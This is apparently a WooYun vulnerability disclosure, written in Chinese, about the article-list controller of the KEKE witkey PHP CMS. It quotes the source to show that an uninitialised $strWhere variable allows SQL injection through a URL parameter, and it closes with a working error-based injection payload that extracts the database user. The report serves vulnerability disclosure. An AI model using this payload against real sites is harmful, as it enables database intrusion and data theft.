WooYun.org

在文件control/articlelist.php中
<?php defined ( 'IN_KEKE' ) or exit ( 'Access Denied' );
$strNavActive = 'articlelist';
$strUrl = $_K['siteurl']."/index.php?do=articlelist";
$catid and $strUrl .="&catid=".intval($catid);
$intPage and $strUrl .="&intPage=".$intPage;
$arrArtCats = kekezu::get_table_data ( "*", "witkey_article_category", "cat_type='article' and art_cat_pid=1", "listorder asc", "", "", "", null );
$page and $intPage = intval($page);
$intPage = intval ( $intPage ) ? $intPage : 1;
$intPagesize = intval ( $intPagesize ) ? $intPagesize : 20;
intval($catid) and $intCatid = intval($catid) or $intCatid = intval($arrArtCats['0']['art_cat_id']);
$intCatid and $strWhere .= " and a.art_cat_id = $intCatid";
$strWhere.=" and a.is_show!=2";
$strWhere .=" order by is_recommend desc,a.listorder asc,pub_time desc";
$strSql = "select a.* ,b.cat_name from " . TABLEPRE . "witkey_article a left join " . TABLEPRE . "witkey_article_category b on a.art_cat_id=b.art_cat_id where b.cat_type='article'  $strWhere";
$strCsql = "select count(a.art_id) as c  from " . TABLEPRE . "witkey_article a left join " . TABLEPRE . "witkey_article_category b on a.art_cat_id=b.art_cat_id where b.cat_type='article'  $strWhere";
$intCount = intval ( db_factory::get_count ( $strCsql,0,NULL, 10*60 ) );
这里$strwhere没有初始化，可以直接在URL参数中传入strwhere.  由于这里$strwhere带入到了两个sql中，用报错法执行方便一点
poc:
strWhere=and%20%28select%201%20from%20%28select%20count%28%2a%29%2Cconcat%28user%28%29%2Cfloor%28rand%280%29%2a2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23